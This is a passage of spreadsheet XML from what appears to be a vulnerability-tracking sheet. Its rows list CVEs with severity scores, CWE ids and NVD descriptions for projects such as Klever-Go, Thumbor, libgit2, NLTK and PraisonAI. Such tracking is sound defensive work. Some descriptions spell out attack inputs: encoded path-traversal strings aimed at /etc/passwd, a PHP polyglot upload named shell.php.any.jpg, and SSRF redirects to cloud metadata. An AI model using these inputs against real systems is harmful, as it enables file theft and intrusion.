      <c r="D2648" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2648" s="5" t="inlineStr"/>
      <c r="F2648" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2648" s="5" t="inlineStr"/>
      <c r="H2648" s="5" t="inlineStr"/>
      <c r="I2648" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J2648" s="5" t="inlineStr"/>
      <c r="K2648" s="5" t="inlineStr">
        <is>
          <t>CWE-129, CWE-248, CWE-617, CWE-755</t>
        </is>
      </c>
      <c r="L2648" s="5" t="inlineStr">
        <is>
          <t>Wings is the server control plane for Pterodactyl, a free, open-source game server management panel. Prior to 1.13.0, a malformed packet received during the SFTP connection handshake causes a Go panic. This issue is fixed in version 1.13.0.</t>
        </is>
      </c>
      <c r="M2648" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52856</t>
        </is>
      </c>
    </row>
    <row r="2649">
      <c r="A2649" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2649" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52878</t>
        </is>
      </c>
      <c r="C2649" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2649" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2649" s="5" t="inlineStr"/>
      <c r="F2649" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2649" s="5" t="inlineStr"/>
      <c r="H2649" s="5" t="inlineStr"/>
      <c r="I2649" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J2649" s="5" t="inlineStr"/>
      <c r="K2649" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="L2649" s="5" t="inlineStr">
        <is>
          <t>Klever-Go is the Go implementation of the Klever blockchain protocol. Versions 1.7.14 through 1.7.17 are vulnerable to a nil-pointer panic triggered by a protobuf Transaction whose embedded RawData sub-message is omitted. This omission causes RawData to decode to nil. Every transaction gossiped on the Klever-Go P2P network is decoded and validated synchronously inside the libp2p pubsub topic-validator callback, where txVersionChecker.CheckTxVersion dereferences tx.RawData.Version with no nil check. Because the libp2p pubsub callback, the underlying go-libp2p-pubsub validation worker, and Klever's own network/p2p layer install no recover(), the panic propagates and crashes the entire node process. The attacker payload is a 3-byte protobuf message; no validator key, stake, funds, or on-chain account is required, and delivery aimed at enough of the BLS validator set can halt block production, resulting in a chain halt. This issue has been fixed in version 1.7.18.</t>
        </is>
      </c>
      <c r="M2649" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52878</t>
        </is>
      </c>
    </row>
    <row r="2650">
      <c r="A2650" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2650" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52879</t>
        </is>
      </c>
      <c r="C2650" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2650" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2650" s="5" t="inlineStr"/>
      <c r="F2650" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2650" s="5" t="inlineStr"/>
      <c r="H2650" s="5" t="inlineStr"/>
      <c r="I2650" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J2650" s="5" t="inlineStr"/>
      <c r="K2650" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="L2650" s="5" t="inlineStr">
        <is>
          <t>Klever-Go is the Go implementation of the Klever blockchain protocol. In versions 1.7.14 through 1.7.17, the direct-message ingress handler spawns a new goroutine for every incoming direct message before the processor-level antiflood layer makes any admission decision, with no semaphore, throttler, or bound on the number of concurrent in-flight spawns. Because the antiflood check runs inside the spawned goroutine rather than before it, a single connected peer can open a direct-send stream and send a stream of well-formed messages to force unbounded goroutine creation, where each goroutine allocates its own stack and holds a message reference until processing completes, adding scheduler and garbage-collection pressure faster than the runtime can drain it. This lets one peer degrade the node's availability and its ability to process legitimate traffic, resulting in a remotely triggerable denial of service. The issue is fixed in 1.7.18.</t>
        </is>
      </c>
      <c r="M2650" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52879</t>
        </is>
      </c>
    </row>
    <row r="2651">
      <c r="A2651" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2651" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52880</t>
        </is>
      </c>
      <c r="C2651" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2651" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2651" s="5" t="inlineStr"/>
      <c r="F2651" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2651" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H2651" s="5" t="inlineStr"/>
      <c r="I2651" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J2651" s="5" t="inlineStr"/>
      <c r="K2651" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="L2651" s="5" t="inlineStr">
        <is>
          <t>Klever-Go is the Go implementation of the Klever blockchain protocol. Versions from 1.7.14 through 1.7.17 are vulnerable to a remotely triggerable denial of service. Both REST APIs are started with the Gin Engine.Run convenience method, which serves requests through Go's default HTTP server with no ReadHeaderTimeout, ReadTimeout, or MaxHeaderBytes configured. As a result, incoming connections that never complete their request headers are held open indefinitely. When a REST listener is reachable beyond localhost through the documented all-interface bind or a Docker port-publish deployment, a single unauthenticated client can open many slow-header connections and hold them open until server file descriptors are exhausted, preventing the API from accepting new connections. This renders the REST API unavailable to legitimate clients. This issue is fixed in version 1.7.18.</t>
        </is>
      </c>
      <c r="M2651" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52880</t>
        </is>
      </c>
    </row>
    <row r="2652">
      <c r="A2652" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2652" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53503</t>
        </is>
      </c>
      <c r="C2652" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2652" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2652" s="5" t="inlineStr"/>
      <c r="F2652" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2652" s="5" t="inlineStr"/>
      <c r="H2652" s="5" t="inlineStr"/>
      <c r="I2652" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J2652" s="5" t="inlineStr"/>
      <c r="K2652" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-369</t>
        </is>
      </c>
      <c r="L2652" s="5" t="inlineStr">
        <is>
          <t>Thumbor is an open-source photo thumbnail service by globo.com. Prior to 7.8.0, Thumbor's filters:convolution(&lt;matrix&gt;, &lt;columns&gt;, &lt;should_normalize&gt;) filter passes the user-controlled &lt;columns&gt; value to a C extension (thumbor/ext/filters/_convolution.c) where it is used as a divisor (for % and /) without validating columns &gt; 0. When columns=0, the C code triggers undefined behavior; on x86_64 this reliably results in a fatal divide-by-zero trap (SIGFPE) and crashes the Thumbor process, causing a remote denial of service. This issue is fixed in 7.8.0.</t>
        </is>
      </c>
      <c r="M2652" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53503</t>
        </is>
      </c>
    </row>
    <row r="2653">
      <c r="A2653" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2653" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53504</t>
        </is>
      </c>
      <c r="C2653" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2653" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2653" s="5" t="inlineStr"/>
      <c r="F2653" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2653" s="5" t="inlineStr"/>
      <c r="H2653" s="5" t="inlineStr"/>
      <c r="I2653" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J2653" s="5" t="inlineStr"/>
      <c r="K2653" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L2653" s="5" t="inlineStr">
        <is>
          <t>Thumbor is an open-source photo thumbnail service by globo.com. Prior to 7.8.0, the convolution filter regular expression performs exponential backtracking on crafted repeated numeric input, allowing a URL request to exhaust processing time. This issue is fixed in 7.8.0.</t>
        </is>
      </c>
      <c r="M2653" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53504</t>
        </is>
      </c>
    </row>
    <row r="2654">
      <c r="A2654" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2654" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53505</t>
        </is>
      </c>
      <c r="C2654" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2654" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2654" s="5" t="inlineStr"/>
      <c r="F2654" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2654" s="5" t="inlineStr"/>
      <c r="H2654" s="5" t="inlineStr"/>
      <c r="I2654" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J2654" s="5" t="inlineStr"/>
      <c r="K2654" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L2654" s="5" t="inlineStr">
        <is>
          <t>Thumbor is an open-source photo thumbnail service by globo.com. Prior to 7.8.0, Thumbor's filters:proportion(&lt;value&gt;) filter does not enforce an upper bound on &lt;value&gt; and runs in the post-transform phase. An attacker can trigger extremely large resizes (CPU/memory exhaustion) and cause denial of service. This issue is fixed in 7.8.0.</t>
        </is>
      </c>
      <c r="M2654" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53505</t>
        </is>
      </c>
    </row>
    <row r="2655">
      <c r="A2655" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2655" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53587</t>
        </is>
      </c>
      <c r="C2655" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2655" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2655" s="5" t="inlineStr"/>
      <c r="F2655" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2655" s="5" t="inlineStr"/>
      <c r="H2655" s="5" t="inlineStr"/>
      <c r="I2655" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="J2655" s="5" t="inlineStr"/>
      <c r="K2655" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-126, CWE-1284, CWE-20</t>
        </is>
      </c>
      <c r="L2655" s="5" t="inlineStr">
        <is>
          <t>libgit2 is a portable C implementation of the Git core methods provided as a linkable library with a solid API, allowing to build Git functionality into your application. Prior to 1.8.6 and 1.9.5, libgit2 performs a fixed-size strncmp in set_data in src/libgit2/transports/smart_pkt.c without first verifying that the smart-protocol pkt-line capability buffer contains 14 bytes. A malicious Git server can make bytes after the pkt-line complete object-format=, causing format_str to advance beyond the pkt-line and the following memchr length calculation to underflow. The resulting heap out-of-bounds walk can crash a client during the first refs-advertisement packet over HTTP, HTTPS, SSH, or the Git protocol. This issue is fixed in versions 1.8.6 and 1.9.5.</t>
        </is>
      </c>
      <c r="M2655" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53587</t>
        </is>
      </c>
    </row>
    <row r="2656">
      <c r="A2656" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2656" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53599</t>
        </is>
      </c>
      <c r="C2656" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2656" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2656" s="5" t="inlineStr"/>
      <c r="F2656" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2656" s="5" t="inlineStr"/>
      <c r="H2656" s="5" t="inlineStr"/>
      <c r="I2656" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J2656" s="5" t="inlineStr"/>
      <c r="K2656" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="L2656" s="5" t="inlineStr">
        <is>
          <t>REDAXO is a PHP-based content management system. From 5.18.2 until 5.21.1, rex_mediapool::isAllowedExtension in redaxo/src/addons/mediapool/lib/mediapool.php lets an authenticated backend user with media[upload] permission upload a JPEG/PHP polyglot named shell.php.any.jpg, which web servers with multi-extension PHP handlers can execute as the web-server user. This issue is fixed in version 5.21.1.</t>
        </is>
      </c>
      <c r="M2656" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53599</t>
        </is>
      </c>
    </row>
    <row r="2657">
      <c r="A2657" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2657" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54293</t>
        </is>
      </c>
      <c r="C2657" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2657" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2657" s="5" t="inlineStr"/>
      <c r="F2657" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2657" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H2657" s="5" t="inlineStr">
        <is>
          <t>nltk:nltk</t>
        </is>
      </c>
      <c r="I2657" s="5" t="inlineStr">
        <is>
          <t>2026-06-22</t>
        </is>
      </c>
      <c r="J2657" s="5" t="inlineStr"/>
      <c r="K2657" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L2657" s="5" t="inlineStr">
        <is>
          <t>NLTK (Natural Language Toolkit) is a suite of open source Python modules, data sets, and tutorials supporting research and development in Natural Language Processing. Prior to 3.10.0-rc1, nltk.data.load() in NLTK is vulnerable to path traversal via URL-encoded path separators and traversal segments when using the nltk: URL scheme. The unsafe-path regex check is performed before url2pathname() decodes the %xx sequences (a classic decode-after-check / TOCTOU-style flaw), allowing an attacker to bypass the protection documented in NLTK's SECURITY.md and read arbitrary files from the filesystem. While literal traversal strings such as ../../../etc/passwd are correctly blocked, encoded variants such as %2fetc%2fpasswd, %2e%2e%2f..., and ..%2f..%2f slip past the regex and are subsequently decoded into a real filesystem path. This vulnerability is fixed in 3.10.0-rc1.</t>
        </is>
      </c>
      <c r="M2657" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54293</t>
        </is>
      </c>
    </row>
    <row r="2658">
      <c r="A2658" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2658" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54598</t>
        </is>
      </c>
      <c r="C2658" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2658" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2658" s="5" t="inlineStr"/>
      <c r="F2658" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2658" s="5" t="inlineStr"/>
      <c r="H2658" s="5" t="inlineStr"/>
      <c r="I2658" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J2658" s="5" t="inlineStr"/>
      <c r="K2658" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L2658" s="5" t="inlineStr">
        <is>
          <t>Wallos is an open-source, self-hostable personal subscription tracker. Prior to version 4.9.4, endpoints/db/migrate.php executes database schema migrations when called over HTTP with zero authentication. Any unauthenticated attacker can trigger pending migration files against the live SQLite database. This issue has been patched in version 4.9.4.</t>
        </is>
      </c>
      <c r="M2658" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54598</t>
        </is>
      </c>
    </row>
    <row r="2659">
      <c r="A2659" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2659" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54599</t>
        </is>
      </c>
      <c r="C2659" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2659" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2659" s="5" t="inlineStr"/>
      <c r="F2659" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2659" s="5" t="inlineStr"/>
      <c r="H2659" s="5" t="inlineStr"/>
      <c r="I2659" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J2659" s="5" t="inlineStr"/>
      <c r="K2659" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="L2659" s="5" t="inlineStr">
        <is>
          <t>Wallos is an open-source, self-hostable personal subscription tracker. Prior to version 4.9.4, login.php generates an OIDC state nonce stored in $_SESSION['oidc_state'], but checksession.php dispatches the OIDC callback without comparing the incoming state against the session value. An attacker can trick a victim into visiting a crafted URL, causing Wallos to exchange the attacker's authorization code and log the victim into the attacker's account. This issue has been patched in version 4.9.4.</t>
        </is>
      </c>
      <c r="M2659" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54599</t>
        </is>
      </c>
    </row>
    <row r="2660">
      <c r="A2660" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2660" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54638</t>
        </is>
      </c>
      <c r="C2660" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2660" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2660" s="5" t="inlineStr"/>
      <c r="F2660" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2660" s="5" t="inlineStr"/>
      <c r="H2660" s="5" t="inlineStr"/>
      <c r="I2660" s="5" t="inlineStr">
        <is>
          <t>2026-07-28</t>
        </is>
      </c>
      <c r="J2660" s="5" t="inlineStr"/>
      <c r="K2660" s="5" t="inlineStr">
        <is>
          <t>CWE-770, CWE-789</t>
        </is>
      </c>
      <c r="L2660" s="5" t="inlineStr">
        <is>
          <t>gotd/td is a T Telegram MTProto API client in Go. Prior to 0.145.1, proto.UnencryptedMessage.Decode in proto/unencrypted_message.go read attacker controlled dataLen from an unauthenticated MTProto unencrypted packet and allocated make([]byte, dataLen) before checking the remaining buffer, allowing remote unauthenticated denial of service through excessive memory allocation and CPU or garbage collection pressure. This issue is fixed in version 0.145.1.</t>
        </is>
      </c>
      <c r="M2660" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54638</t>
        </is>
      </c>
    </row>
    <row r="2661">
      <c r="A2661" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2661" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54788</t>
        </is>
      </c>
      <c r="C2661" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2661" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2661" s="5" t="inlineStr"/>
      <c r="F2661" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2661" s="5" t="inlineStr"/>
      <c r="H2661" s="5" t="inlineStr"/>
      <c r="I2661" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J2661" s="5" t="inlineStr"/>
      <c r="K2661" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L2661" s="5" t="inlineStr">
        <is>
          <t>dd-trace-rs provides Datadog application performance monitoring for Rust. From 0.1.0 until 0.3.3, datadog-opentelemetry/src/propagation/tracecontext.rs parses the W3C tracestate header and collects every semicolon-separated key and value pair in the Datadog dd=... vendor entry into a HashMap without enforcing a pair count or entry size limit. Because tracecontext extraction is enabled by default, a remote unauthenticated attacker can send an arbitrarily large dd=... entry and force excessive CPU and memory consumption for each request, causing denial of service in an instrumented network service. This vulnerability is fixed in 0.3.3.</t>
        </is>
      </c>
      <c r="M2661" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54788</t>
        </is>
      </c>
    </row>
    <row r="2662">
      <c r="A2662" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2662" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55099</t>
        </is>
      </c>
      <c r="C2662" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2662" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2662" s="5" t="inlineStr"/>
      <c r="F2662" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2662" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H2662" s="5" t="inlineStr"/>
      <c r="I2662" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J2662" s="5" t="inlineStr"/>
      <c r="K2662" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-407</t>
        </is>
      </c>
      <c r="L2662" s="5" t="inlineStr">
        <is>
          <t>icalendar is an RFC 5545 compatible parser and generator of iCalendar files for Python. From 7.1.0 until 7.1.3, the Component equality method in src/icalendar/cal/component.py compares nested subcomponents with two membership loops, and each membership test invokes the same method on child components, causing O(2^n) work relative to nesting depth. Component.from_ical accepts arbitrarily nested BEGIN:VEVENT blocks without a depth limit, so an attacker can submit a sub-kilobyte .ics file containing equal nested subtrees and trigger the cost when an application performs equality, inequality, membership, deduplication, test-assertion, round-trip, or normalization comparisons. Parsing alone does not trigger the issue, and comparisons that differ early short-circuit, but a few hundred bytes can pin a CPU core for minutes or indefinitely, causing denial of service in calendar sync or import endpoints, invite processing, and other comparison paths. This issue is fixed in version 7.1.3.</t>
        </is>
      </c>
      <c r="M2662" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55099</t>
        </is>
      </c>
    </row>
    <row r="2663">
      <c r="A2663" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2663" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55215</t>
        </is>
      </c>
      <c r="C2663" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2663" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2663" s="5" t="inlineStr"/>
      <c r="F2663" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2663" s="5" t="inlineStr">
        <is>
          <t>node.js, mysql</t>
        </is>
      </c>
      <c r="H2663" s="5" t="inlineStr"/>
      <c r="I2663" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J2663" s="5" t="inlineStr"/>
      <c r="K2663" s="5" t="inlineStr">
        <is>
          <t>CWE-295, CWE-522</t>
        </is>
      </c>
      <c r="L2663" s="5" t="inlineStr">
        <is>
          <t>MariaDB Connector/Node.js is used to connect applications developed on Node.js to MariaDB and MySQL databases. Prior to versions 3.3.3, 3.4.6, and 3.5.3, when ssl is enabled without a pinned CA or server certificate, MariaDB Connector/Node.js sends credentials before completing certificate fingerprint validation. In lib/cmd/handshake/auth/handshake.js, a server that selects mysql_clear_password as the initial authentication plugin can receive the password before the post-TLS identity check. In lib/cmd/handshake/authentication.js, an authentication switch can evaluate the previous plugin instead of the requested target plugin, allowing mysql_clear_password to send the credential first. An active man-in-the-middle can present a self-signed certificate, capture the database password, and use it to authenticate directly even though the connector later rejects the server and closes the connection. This issue is fixed in versions 3.3.3, 3.4.6, and 3.5.3.</t>
        </is>
      </c>
      <c r="M2663" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55215</t>
        </is>
      </c>
    </row>
    <row r="2664">
      <c r="A2664" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2664" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55484</t>
        </is>
      </c>
      <c r="C2664" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2664" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2664" s="5" t="inlineStr"/>
      <c r="F2664" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2664" s="5" t="inlineStr"/>
      <c r="H2664" s="5" t="inlineStr"/>
      <c r="I2664" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J2664" s="5" t="inlineStr"/>
      <c r="K2664" s="5" t="inlineStr">
        <is>
          <t>CWE-248, CWE-754</t>
        </is>
      </c>
      <c r="L2664" s="5" t="inlineStr">
        <is>
          <t>ALOS HTTP is a Linux-first Go web framework and application server built around a custom networking stack. Prior to 0.0.0-20260617230736-314b6783e196, core/utils.go::sanitizeRequestPath calls splitPathQuery on a request path beginning with a question mark and then performs the unchecked p[0] access without checking whether the resulting path is empty. An unauthenticated client can send a malformed request such as a question-mark-only path through h1_plain.go::ParseH1RequestHead, hpack.go::decodeSimpleGetPathHTTPSRequest, hpack.go::observeHeader, or h3_conn.go::handleRequestStream, causing an out-of-bounds panic before core.Recovery() middleware runs and terminating the server process. This issue is fixed in pseudo-version 0.0.0-20260617230736-314b6783e196.</t>
        </is>
      </c>
      <c r="M2664" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55484</t>
        </is>
      </c>
    </row>
    <row r="2665">
      <c r="A2665" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2665" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55524</t>
        </is>
      </c>
      <c r="C2665" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2665" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2665" s="5" t="inlineStr"/>
      <c r="F2665" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2665" s="5" t="inlineStr"/>
      <c r="H2665" s="5" t="inlineStr"/>
      <c r="I2665" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J2665" s="5" t="inlineStr"/>
      <c r="K2665" s="5" t="inlineStr">
        <is>
          <t>CWE-367, CWE-918</t>
        </is>
      </c>
      <c r="L2665" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. In versions prior to 1.6.58, the web_crawl tool performs its SSRF check only on the initially supplied URL, allowing the protection to be bypassed so the tool connects to attacker-chosen internal destinations. The check resolves the hostname once with socket.gethostbyname and rejects private/loopback/link-local results, but then passes the URL to a fetcher using httpx.Client(follow_redirects=True) (or urllib.request.urlopen when httpx is absent, which also follows redirects) that re-resolves the hostname at connect time with no further validation. This validate-here/fetch-there gap is exploitable through both HTTP redirects and DNS rebinding. If an attacker can influence URLs passed to web_crawl(), directly or through an agent/tool workflow, they can cause the PraisonAI host to fetch loopback, private-network, or cloud metadata endpoints reachable from that host, with the response body returned in the web_crawl() result. This issue has been fixed in version 1.6.58.</t>
        </is>
      </c>
      <c r="M2665" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55524</t>
        </is>
      </c>
    </row>
    <row r="2666">
      <c r="A2666" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2666" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55525</t>
        </is>
      </c>
      <c r="C2666" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2666" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2666" s="5" t="inlineStr"/>
      <c r="F2666" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2666" s="5" t="inlineStr"/>
      <c r="H2666" s="5" t="inlineStr"/>
      <c r="I2666" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J2666" s="5" t="inlineStr"/>
      <c r="K2666" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L2666" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. Prior to praisonaiagents 1.6.58, the web_crawl function validates only the initial URL before _crawl_with_httpx uses httpx.Client(follow_redirects=True). Redirect targets are not revalidated, so an attacker who influences a crawl target can redirect a public URL to loopback, private network, or cloud metadata services while ALLOW_LOCAL_CRAWL remains disabled. The fetched internal response is returned to the agent context. This issue is fixed in version 1.6.58.</t>
        </is>
      </c>
      <c r="M2666" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55525</t>
        </is>
